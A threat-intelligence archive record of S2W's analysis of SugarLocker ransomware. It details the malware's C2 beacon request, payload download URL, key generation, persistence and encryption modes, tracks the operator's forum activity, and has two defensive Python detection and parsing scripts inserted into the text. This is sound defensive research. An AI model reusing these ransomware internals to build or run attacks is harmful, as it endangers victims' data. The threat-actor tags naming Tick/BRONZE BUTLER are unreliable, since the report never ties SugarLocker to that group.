{
	"id": "f4d108c6-8372-4589-922a-c75161bdd803",
	"created_at": "2026-04-06T00:21:59.91957Z",
	"updated_at": "2026-04-10T03:36:13.800881Z",
	"deleted_at": null,
	"sha1_hash": "e49d8dfcaba05b4e72e415f6360e917c60b33797",
	"title": "Tracking SugarLocker ransomware \u0026 operator",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3624110,
	"plain_text": "Tracking SugarLocker ransomware \u0026 operator\r\nBy S2W\r\nPublished: 2022-02-18 · Archived: 2026-04-05 22:03:48 UTC\r\nFeb 17, 2022\r\nAuthor: S2W TALON\r\nLast Modified : 2022.02.17.\r\nTable of Contents\r\n1. Executive Summary\r\n2. SugarLocker Detailed Analysis\r\n3. History of SugarLocker Ransomware\r\n4. DDW activity of SugarLocker ransomware operator\r\nExecutive Summary\r\nThe user “gustavedore”, who operates the SugarLocker ransomware, started RaaS activities in November 2021 and is looking for partners on RAMP, a dark web forum focused on ransomware.\r\nhttps://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49\r\nPage 1 of 23\n\nThe partner recruitment post on the RAMP forum states the following:\r\nThe team currently attacks mainly through networks and RDP (Remote Desktop Protocol).\r\nOnly partners who can start working immediately are recruited.\r\nNo attacks on CIS (Commonwealth of Independent States) countries; the Baltic states and Poland are excluded from that restriction.\r\nProposed profit-sharing ratios (partner/SugarLocker):\r\n- Initially: 70%/30%\r\n- After 5 successful corporate attacks: 75%/25%\r\n- Weekly earnings of $200k: 80%/20%\r\n- Weekly earnings of $1M: 85%/15%\r\n- Monthly earnings of $5M: 90%/10%\r\nSugarLocker (also known as Encoded01 ransomware) is written in Delphi and offers more options than other RaaS offerings. So far, no connection with other known ransomware groups has been confirmed. 
Its ransom note is modeled on REvil’s, and its negotiation page on CLOP’s.\r\nSupports 3 execution parameters\r\nData obfuscation with custom encoding and encryption algorithms\r\nCustomizable configuration values per build, as expected of a RaaS offering\r\nProvides 3 file encryption algorithms of varying speeds (SCOP, RC6, Salsa20)\r\nProvides 2 key encryption algorithms (RSA, ElGamal)\r\nDownloads the Tor browser from an external URL and creates a shortcut file\r\nAs a result of hunting for SugarLocker samples, it is presumed that the operator has been producing the ransomware since at least early 2021. It appears to have been distributed since the second half of 2021, but no attack cases have been confirmed so far. The group does not operate a data leak site, and the ransomware appears to have been renamed recently, so it does not yet appear to be active. However, the ransomware functionality was continuously updated until the end of 2021, so full operations will likely start once partners are successfully recruited.\r\nSugarLocker Detailed Analysis\r\nFile Information\r\nMD5: 1cc5b508da9567f032ed78375bb45959\r\nSHA-1: c31a0e58ae70f571bf8140db8a1ab20a7f566ab5\r\nSHA-256: 315045e506eb5e9f5fd24e4a55cda48d223ac3450037586ce6dab70afc8ddfc9\r\nCreation Time: 2021-09-04 18:00:27 (UTC)\r\nFile type: x86, exe\r\n1. Supports 3 command-line arguments\r\nThe latest SugarLocker build supports three arguments. Among them, the -data argument disables per-device key generation and uses one encryption key for every device in the network. In that case all infected devices can be decrypted with a single recovery tool.\r\n2. 
TokenVirtualizationEnabled\r\nUAC file and registry virtualization is disabled by setting the TokenVirtualizationEnabled value of the current token to 0.\r\n3. Custom encoding and encryption algorithm\r\nSugarLocker uses a custom encryption algorithm to encrypt strings and data. A custom encoding algorithm is used mainly when sending information to the server or storing it in the registry.\r\n4. Configuration\r\nSugarLocker embeds 22 configuration options. Most of them can be set by the affiliate when the ransomware is built, but infrastructure and public key values such as ONION_URL and C2_IP cannot be modified.\r\n5. Generate infected device ID\r\nTo identify an infected device, an ID is derived from the three values below. The hex string of the combined values is hashed with MD5, and the first 12 characters of the uppercase hex digest are used as the device ID. If generation fails, the ID is set to “unk”. Two additional ID values are then derived from this value.\r\nSerial number of the physical drive (PhysicalDrive0)\r\nOperating system installation date (InstallDate)\r\nComputer name (GetComputerNameW)\r\n6. Back up important data to a specific registry\r\nUnder HKCU\\SOFTWARE\\, a key whose path uses the string [ID1] is created to back up important data. Each value under this key backs up a different piece of data (listed in a figure in the original post).\r\n7. Generate File Encryption Key\r\n(single mode) When a different file encryption key is generated for each PC, the key material is built by joining the values from the following 7 sources with “|”. Four MD5 hash strings derived from it are concatenated to produce a 128-byte string. 
This value is then custom-encrypted and stored in the registry value “2”.\r\nID: 12-digit infected device ID (ID3)\r\nTICK: System tick count (GetTickCount)\r\nRAN: Random number (Delphi Random, an LCG)\r\nGEN: Cryptographically random bytes (CryptGenRandom)\r\nCOUNT: Performance counter (QueryPerformanceCounter) + current time\r\nCURSOR: X and Y coordinates of the current mouse cursor\r\nTIME: Current time\r\nOf these sources only CryptGenRandom is cryptographically strong; the tick count, LCG output, counters, cursor position and time are predictable, so the unpredictability of the key rests on the GEN component.\r\n(network mode) When FLAG_NetworkMode is enabled, SugarLocker runs in network mode and encrypts the files of every device in the network with one specified key. The key is taken from the -data parameter or from a file, as follows. If the -data parameter is absent, the key is read from a cmd.txt file at one of the paths below on the infected device, so the attacker must create that file before execution.\r\nC:\\Users\\[Username]\\AppData\\Local\\Temp\\cmd.txt\r\nC:\\Users\\[Username]\\Appdata\\Local\\cmd.txt\r\nC:\\cmd.txt\r\n8. Collecting infected device information\r\nThe fid field carries PubkeyMode and FileEncryptionMode. The encryption-related data is encoded with the custom encoding algorithm, and the final combined data is encoded the same way. 
This value is then custom-encrypted and stored in the registry value “4”.\r\nThe public IP of the infected device is collected by contacting the following 5 IP lookup sites in order and parsing the IP from the response.\r\nhttps://whatismyipaddress.com\r\nhttps://www.ip2location.com\r\nhttps://www.whatismyip.com/ip-address-lookup/\r\nhttp://checkip.dyndns.org\r\nhttps://get.geojs.io/v1/ip/geo.js\r\n9. Create mutex\r\nIf the FLAG_Debug option is disabled, a mutex is created to detect duplicate execution. If a SugarLocker process is already running, the current process terminates.\r\nMutex name: [ID2]\r\n10. Register in the registry to automatically run after booting\r\nIf the FLAG_Autorun option is enabled, SugarLocker runs at every boot by registering its current file path in the registry below.\r\nPATH: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nKey: [ID2]\r\nValue: [Current path]\r\n11. Infected device information sent to the C2 server IP\r\nA thread sends the infected device information to the C2 server every 15 minutes. Unlike the data collected in section 8, the encryption-related fid data is not sent; only the pre-infection status and the encryption mode are. On successful transmission the server returns the string “200”, encoded with the custom encoding algorithm. 
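As an added illustration, and not code from the S2W post or from SugarLocker itself: a small Python triage script that applies the artifacts described in sections 6, 8, 10 and 11 above (numeric backup values under the HKCU SOFTWARE key, the burst of public IP lookups, the Run key entry, and the POST beacon to 179.43.160.195 with its User-Agent) to a constructed set of host and network events. The event schema, the ten-minute lookup window, the three-site threshold, the severity weights and the user-profile heuristic for the Run value are all assumptions of this example, and the sample events are constructed, not real telemetry.

```python
from collections import defaultdict

# Backslash is built with chr(92) so this listing carries no escape sequences.
BS = chr(92)

def winpath(*parts):
    return BS.join(parts)

# Indicators quoted from the report text above (sections 8, 10 and 11).
C2_IP = '179.43.160.195'
BEACON_UA = ('Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 '
             '(KHTML, like Gecko) Chrome/87.0.4')
IP_LOOKUP_HOSTS = {'whatismyipaddress.com', 'www.ip2location.com',
                   'www.whatismyip.com', 'checkip.dyndns.org', 'get.geojs.io'}
RUN_KEY = winpath('HKCU', 'Software', 'Microsoft', 'Windows', 'CurrentVersion', 'Run')
HKCU_SOFTWARE = winpath('HKCU', 'SOFTWARE')

# Assumed thresholds (not from the report): three or more of the five lookup
# sites contacted within ten minutes count as one indicator.
LOOKUP_MIN_SITES, LOOKUP_WINDOW_SEC = 3, 600
WEIGHT = {'low': 1, 'medium': 3, 'high': 6}

def rule_c2_beacon(events):
    # Section 11: periodic POST to the hard-coded C2 IP with a fixed User-Agent.
    hits = []
    for e in events:
        if e['type'] == 'net' and e.get('dst_ip') == C2_IP and e.get('method') == 'POST':
            hits.append(('c2_beacon', 'high' if e.get('ua') == BEACON_UA else 'medium'))
    return hits

def rule_ip_lookup_cluster(events):
    # Section 8: the public IP is fetched from up to five lookup sites in a row.
    lookups = sorted((e['ts'], e['host_hdr']) for e in events
                     if e['type'] == 'net' and e.get('host_hdr') in IP_LOOKUP_HOSTS)
    for i, (t0, _) in enumerate(lookups):
        seen = {h for t, h in lookups[i:] if t - t0 <= LOOKUP_WINDOW_SEC}
        if len(seen) >= LOOKUP_MIN_SITES:
            return [('ip_lookup_cluster', 'medium')]
    return []

def rule_run_key(events):
    # Section 10: Run value pointing at the current binary. Treating a user
    # profile location as suspicious is a heuristic of this example.
    hits = []
    for e in events:
        if e['type'] == 'reg' and e['key'].lower() == RUN_KEY.lower():
            parts = e['data'].split(BS)
            if 'Users' in parts and parts[-1].lower().endswith('.exe'):
                hits.append(('run_key_user_profile', 'medium'))
    return hits

def rule_backup_values(events):
    # Section 6: custom-encrypted blobs stored under HKCU SOFTWARE [ID1] in
    # values whose names are bare numbers such as 2 and 4.
    prefix = (HKCU_SOFTWARE + BS).lower()
    hits = []
    for e in events:
        if e['type'] != 'reg' or not e['key'].lower().startswith(prefix):
            continue
        subkey = e['key'][len(prefix):]
        if BS not in subkey and e['value'].isdigit():
            hits.append(('numeric_backup_value', 'low'))
    return hits

RULES = (rule_c2_beacon, rule_ip_lookup_cluster, rule_run_key, rule_backup_values)

def score_host(events):
    # Returns (score, sorted distinct rule names) for the events of one host.
    findings = [f for rule in RULES for f in rule(events)]
    return sum(WEIGHT[sev] for _, sev in findings), sorted({n for n, _ in findings})

def triage(events, threshold=6):
    # Group events by host and report those at or above the threshold.
    by_host = defaultdict(list)
    for e in events:
        by_host[e['host']].append(e)
    flagged = {}
    for host, evs in by_host.items():
        score, names = score_host(evs)
        if score >= threshold:
            flagged[host] = (score, names)
    return flagged

# Constructed events (not real telemetry): WS01 mimics the report, WS02 is benign.
def net(host, ts, host_hdr, dst_ip, method, ua=None):
    return {'host': host, 'ts': ts, 'type': 'net', 'host_hdr': host_hdr,
            'dst_ip': dst_ip, 'method': method, 'ua': ua}

def reg(host, ts, key, value, data):
    return {'host': host, 'ts': ts, 'type': 'reg', 'key': key, 'value': value, 'data': data}

SAMPLE_EVENTS = [
    net('WS01', 1000, 'whatismyipaddress.com', '203.0.113.10', 'GET'),
    net('WS01', 1003, 'www.ip2location.com', '203.0.113.11', 'GET'),
    net('WS01', 1006, 'checkip.dyndns.org', '203.0.113.12', 'GET'),
    reg('WS01', 1010, winpath('HKCU', 'SOFTWARE', 'A1B2C3D4E5F6'), '2', 'opaque blob'),
    reg('WS01', 1012, RUN_KEY, 'A1B2C3D4E5F6',
        winpath('C:', 'Users', 'alice', 'AppData', 'Local', 'Temp', 'svc.exe')),
    net('WS01', 1020, C2_IP, C2_IP, 'POST', BEACON_UA),
    net('WS01', 1920, C2_IP, C2_IP, 'POST', BEACON_UA),
    net('WS02', 2000, 'www.whatismyip.com', '203.0.113.13', 'GET'),
    reg('WS02', 2100, RUN_KEY, 'OneDrive',
        winpath('C:', 'Program Files', 'OneDrive', 'OneDrive.exe')),
]

if __name__ == '__main__':
    print(triage(SAMPLE_EVENTS))
```

A single beacon to the C2 IP already clears the threshold on its own; the lookup burst and the numeric registry values are weak signals in isolation (IP lookup sites are used by plenty of legitimate software), which is why they carry low weights and only add confidence to a host that is already suspicious.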
Additional actions such as receiving data or executing commands are not implemented.\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4\r\nHost: 179.43.160.195\r\nContent-Length: [Data Length]\r\nCache-Control: no-cache\r\n12. Download the Tor browser to access the negotiation site\r\n1) First, to create a Tor browser directory on the desktop, the desktop path is determined according to the integrity level of the current token.\r\nSystem privileges: finds user logon sessions and collects the user profile path\r\nOther privileges: collects the Desktop path with the SHGetKnownFolderPath API\r\n2) It then fetches additional files from the download URL.\r\nDownload URL: http://cdn2546713[.]cdnmegafiles.com/data23072021_1.dat\r\nGET /data23072021_1.dat HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4\r\nHost: cdn2546713.cdnmegafiles.com\r\nCache-Control: no-cache\r\n3) The 16-byte MD5 value at the start of the file is compared with the MD5 hash of the remaining data to verify that the download completed. If verification fails, the download and check are retried every 5 minutes. This is an integrity check against truncation, not an authenticity check: anyone who can tamper with the download can recompute the MD5 prefix.\r\n4) When file encryption has finished, the downloaded file is stored at the path below.\r\nC:\\Users\\[Username]\\Desktop\\browser\\browser.zip\r\n5) Verification is then performed the same way as in 3), and the custom-encrypted data is decrypted using the leading 16 bytes of the remaining data as the key.\r\n6) The values at offsets 0~3 and 4~7 of the decrypted data are each checked to be smaller than 0x11E1A300 (300 MB), and processing continues only if both are. 
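An added example, not the S2W post’s code and not SugarLocker’s own unpacker: a Python parser for the download format described in steps 3) to 6) above and the [File size][File path][File data] record layout of step 8) below. It checks the leading MD5 against the rest of the file, applies the 300 MB bound to the two size fields, and walks the records. The custom cipher of step 5) and the aPLib decompression of step 7) are not reproduced, so unpack_stage takes both transforms as callables; 32-bit little-endian size fields, a 32-bit path length and UTF-8 paths are assumptions of this example, and the sample stage is constructed.

```python
import hashlib
import struct

MAX_STAGE_SIZE = 0x11E1A300   # 300,000,000 bytes, the bound quoted in step 6
MD5_LEN = 16
BS = chr(92)                  # backslash, so the listing has no escape sequences

def verify_envelope(blob):
    # Step 3: the first 16 bytes must equal the MD5 of everything after them.
    if len(blob) <= MD5_LEN:
        return None
    digest, payload = blob[:MD5_LEN], blob[MD5_LEN:]
    return payload if hashlib.md5(payload).digest() == digest else None

def build_envelope(payload):
    # Constructed counterpart used to make test input.
    return hashlib.md5(payload).digest() + payload

def parse_stage_header(decrypted):
    # Step 6: two sizes, each required to be below 0x11E1A300. Little-endian
    # 32-bit fields are assumed (x86 Delphi); the report gives only the offsets.
    if len(decrypted) < 8:
        return None
    csize, dsize = struct.unpack('<II', decrypted[:8])
    if csize >= MAX_STAGE_SIZE or dsize >= MAX_STAGE_SIZE:
        return None
    body = decrypted[8:8 + csize]
    return (csize, dsize, body) if len(body) == csize else None

def parse_records(data):
    # Step 8 layout [File size][File path][File data]; the 32-bit size, 32-bit
    # path length and UTF-8 path are assumptions of this example.
    files, off = [], 0
    while off < len(data):
        if off + 8 > len(data):
            raise ValueError('truncated record header')
        size, plen = struct.unpack_from('<II', data, off)
        off += 8
        path = data[off:off + plen].decode('utf-8')
        off += plen
        body = data[off:off + size]
        off += size
        if len(body) != size:
            raise ValueError('truncated body for ' + path)
        # Defensive check for anyone unpacking a stage into a sandbox directory.
        if '..' in path.replace(BS, '/').split('/') or path.startswith(('/', BS)):
            raise ValueError('unsafe path ' + path)
        files.append((path, body))
    return files

def build_records(files):
    out = bytearray()
    for path, body in files:
        p = path.encode('utf-8')
        out += struct.pack('<II', len(body), len(p)) + p + body
    return bytes(out)

def unpack_stage(blob, decrypt, decompress):
    # Full chain of steps 3 to 8. The custom cipher (step 5) and aPLib (step 7)
    # are not reproduced here, so the caller supplies both transforms.
    payload = verify_envelope(blob)
    if payload is None:
        return None
    header = parse_stage_header(decrypt(payload))
    if header is None:
        return None
    csize, dsize, body = header
    plain = decompress(body)
    return parse_records(plain) if len(plain) == dsize else None

def identity(b):
    # Stands in for the decrypt and decompress transforms in the constructed case.
    return b

SAMPLE_FILES = [
    (BS.join(['browser', 'firefox.exe']), b'MZ' + bytes(30)),
    (BS.join(['browser', 'Browser', 'TorBrowser', 'Data', 'Tor', 'torrc']), b'SocksPort 9150'),
]

def build_stage(files):
    # Constructed stage: MD5 envelope around header + records, no cipher or compression.
    recs = build_records(files)
    return build_envelope(struct.pack('<II', len(recs), len(recs)) + recs)

def tampered(blob):
    flipped = bytearray(blob)
    flipped[-1] ^= 1
    return bytes(flipped)

OVERSIZE_HEADER = struct.pack('<II', MAX_STAGE_SIZE, 16) + bytes(16)

if __name__ == '__main__':
    for path, body in unpack_stage(build_stage(SAMPLE_FILES), identity, identity):
        print(path, len(body))
```

On a real sample a wrong field-width assumption shows up immediately, either as a size that fails the 300 MB bound or as a truncated record, so the assumptions above are cheap to falsify once the custom cipher and the aPLib step are plugged in.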
The value at offsets 0~3 is the size of the compressed data and the value at offsets 4~7 is the size after decompression.\r\n7) The remaining data is decompressed with aPLib.\r\n8) The extracted data is stored as [File size][File path][File data] records and contains all the files of the Tor browser.\r\n9) Finally, the negotiation page is opened by running firefox.exe with the negotiation page URL as a parameter, as shown below. The infected device information passed here is the same as the value stored in registry value “4” and in the ransom note.\r\nC:\\Users\\[Username]\\Desktop\\browser\\firefox.exe –allow-remote [ONION_URL]?data=[Infected device informati\r\n10) A shortcut that runs the above command line is created on the desktop.\r\nFilename: SUPPORT (TOR_BROWSER).lnk\r\n13. Create a trace file in the temp path\r\nJust before file encryption starts, one TXT file containing the string “0” is created in the %temp% path.\r\nFilepath: C:\\Users\\[Username]\\AppData\\Local\\Temp\\run_[Current Time].txt\r\n14. List excluded from encryption\r\nAll files are encrypted except the folders, files, and extensions listed as exclusions in the malware. An option to encrypt only specific file extensions can also be set when the ransomware is built; its default value is *.*, which targets all files. The three exclusion lists are shown as figures in the original post.\r\n1) Paths excluded from encryption (7 total)\r\n2) Files excluded from encryption (4 total)\r\n3) Extensions excluded from encryption (12 total)\r\n15. 
File encryption\r\n1) A SugarLocker build created in debug mode does not encrypt files, because the FLAG_Debug option is enabled.\r\n2) By default SugarLocker encrypts files on local and removable drives. It also creates a separate thread that encrypts the current user’s desktop path first, with raised priority. Unless the parameter -net=0 is given, network shared drives are encrypted as well.\r\nLocal drive\r\nRemovable drive\r\nNetwork share drive\r\nDesktop\r\n3) When encrypting network drives, the target network drive path is logged and encrypted after classifying the resource type via the DisplayType of the network resource.\r\n4) For each target path, files are selected using the exclusion lists from 14. List excluded from encryption together with the file attributes. Files carrying any of the attributes below, most of which mark offline or placeholder files whose contents are not resident on the local drive, are not encrypted.\r\nFILE_ATTRIBUTE_RECALL_ON_OPEN\r\nFILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS\r\nFILE_ATTRIBUTE_OFFLINE\r\nFILE_ATTRIBUTE_NO_SCRUB_DATA\r\n5) A file search thread is created per drive, and when a file to encrypt is found, a separate thread is created to encrypt that file.\r\n6) At most 100,000 files are encrypted per folder; files beyond that number are left untouched.\r\n7) If a file is larger than [MAX_FILE_SIZE] MB, it is not encrypted. 
Smaller files are encrypted in full, in chunks of 0x4000 bytes.\r\n8) Three file encryption modes are supported, and the one actually used is selected by FileEncryptionMode. This sets SugarLocker apart from other ransomware, which offers at most one or two modes; each mode trades encryption strength against speed differently. The key generated in 7. Generate File Encryption Key is truncated to the size each mode needs.\r\nSCOP: The leading 0x30 bytes are used as the encryption key.\r\nRC6: The leading 0x30 bytes are used as the encryption key.\r\nSalsa20: The leading 0x28 bytes are used as the encryption key (0x28 bytes matches a 256-bit Salsa20 key plus a 64-bit nonce).\r\n9) After a file is encrypted, 104 bytes of additional data are appended. This trailer includes the signature “ctSb”, the original file size, and a checksum of the original file data; all other fields are fixed values.\r\n10) The encrypted file is saved with .encoded01 appended to its existing extension.\r\n11) A ransom note is written into every folder that was traversed.\r\nRansom note filename: BackFiles_encoded01.txt\r\n16. Execute ransom note\r\nThe desktop path is determined in the same way as in 12. Download the Tor browser to access the negotiation site. A ransom note with the path and contents below is then created, and a notepad.exe process is launched to display it.\r\nRansom note file path : C:\\Users\\[Username]\\Desktop\\BackFiles_encoded01.txt\r\n[+] Whats Happen?[+] Your files are encrypted, and currently unavailable. 
You can check it: all files on\r\nHistory of SugarLocker Ransomware\r\nThe latest version of SugarLocker confirmed to date (January 10, 2022) is 1.0.6; versions 1.0.5, 1.0.4, and 1.0.3 were obtained through additional hunting. Starting from version 1.0.4, one execution parameter was added with each new version, and from version 1.0.5 a logging function that records whether each malicious action succeeded was included.\r\nPacking to evade antivirus detection has been applied since version 1.0.3, the oldest version obtained. The compile timestamps of the unpacked samples are all the Delphi default, June 19, 1992, so the exact build time cannot be determined, but the compile timestamp of the packed sample differs for each version, and those timestamps suggest that SugarLocker production started before February 2021.\r\nIn 2021, a total of 112 SugarLocker samples were obtained through VirusTotal; the earliest upload date is November 6, 2021. 
That first upload was already the latest version, 1.0.6. Interestingly, 109 SugarLocker samples were uploaded on November 25, 2021, spread evenly across versions 1.0.3 to 1.0.6.\r\nPer-version statistics for the 112 samples are given in a figure in the original post.\r\nMost of the 112 samples collected in 2021 were packed and were well-formed PE files. By contrast, most of the 141 samples collected in 2022 were version 1.0.6 but were unpacked and broken PE files.\r\nInterestingly, many of these files started being uploaded to VirusTotal on February 2nd, the date Walmart published its analysis of SugarLocker. In addition, messages from the operator, absent from earlier samples, suddenly began to appear inside the malware. It seems the operator distributed this dummy malware to distract analysts after the analysis report was released. The operator’s message embedded in SugarLocker is reproduced as a figure in the original post.\r\nPer-version statistics for all 253 samples are also given there.\r\nDDW activity of SugarLocker ransomware operator\r\nThe user “gustavedore”, the operator of SugarLocker, has been active on RAMP since first posting on November 11, 2021, on the RaaS board of the RAMP forum. Recently the ransomware appears to have been renamed from SugarLocker to Andropov. The post was written in three languages: Russian, English, and Chinese.\r\nWe found that he was active on XSS about two years ago and used the nickname “JimJones” on the Exploit forum. At the time, he did not seem very interested in ransomware. 
He currently uses the nickname “GistaveDore” on the Exploit forum.\r\nHe was primarily active on the Exploit forum and wrote in Russian. On July 30, 2020, he suddenly announced that he would start developing ransomware in C++. On August 8, he was also looking for a pentester. Later, on September 2, he tried to recruit two developers for the ransomware, mentioning that he would also pay for an office and a salary. On December 23, he looked for investors for his services.\r\n1. May 25, 2020: Posted a developer advertisement on the Exploit forum.\r\n2. May 29, 2020: Posted a developer advertisement on the XSS forum.\r\n3. July 30, 2020: Posted that he would code a ransomware affiliate program.\r\n4. December 23, 2020: Looked for an investor to fund or promote his services.\r\n“magtest.tk” domain information (shown in a figure in the original post)\r\n5. May 27, 2021: First post on Exploit under the new nickname “GistaveDore”.\r\n6. November 04, 2021: Joined RAMP, a dark web forum focused on ransomware.\r\n7. November 11, 2021: Posted the first partner recruitment advertisement on the RAMP forum.\r\n8. 
November 11, 2021 ~ January 22, 2022: Posted partner recruitment advertisements on the Freelance board of the RAMP forum.\r\n9. January 08~09, 2022: Ransomware renamed from SugarLocker to Andropov.\r\n10. February 11, 2022: Suddenly posted an Android loader advertisement.\r\n11. February 11, 2022: Also showed interest in another area, NFTs.\r\nConclusion\r\nThe latest version of SugarLocker ransomware found so far is 1.0.6, and since the code in the ransomware is still incomplete, its functionality will likely continue to be improved.\r\nGiven that it offers more customization options than existing RaaS offerings, the new group appears to be putting considerable effort into customization features in order to recruit partners.\r\nAlthough the ransomware is still unfinished, defenders need to prepare for it in advance, as it can become active once partners are successfully recruited.\r\n“gustavedore” appears to have started as a developer rather than a RaaS operator, but recently moved his business to RaaS. Now he seems to be focusing on Android and NFTs rather than RaaS. (Is the
recruitment not going well?)\r\nReference\r\nhttps://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb\r\nhttps://id-ransomware.blogspot.com/2021/11/encoded01-ransomware.html\r\nAppendix A.\r\nSugarLocker’s SHA256 hashes and configuration\r\nhttps://docs.google.com/spreadsheets/d/1er3vNUYAWR60f_OL67ewJloYVGkWHNYMTESlhDawXS4/edit#gid=0\r\nAppendix B.\r\nSugarLocker Negotiation Page (shown in a figure in the original post)\r\nSource: https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49"
	],
	"report_names": [
		"tracking-sugarlocker-ransomware-3a3492353c49"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434919,
	"ts_updated_at": 1775792173,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.pdf",
		"text": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.txt",
		"img": "https://archive.orkl.eu/e49d8dfcaba05b4e72e415f6360e917c60b33797.jpg"
	}
}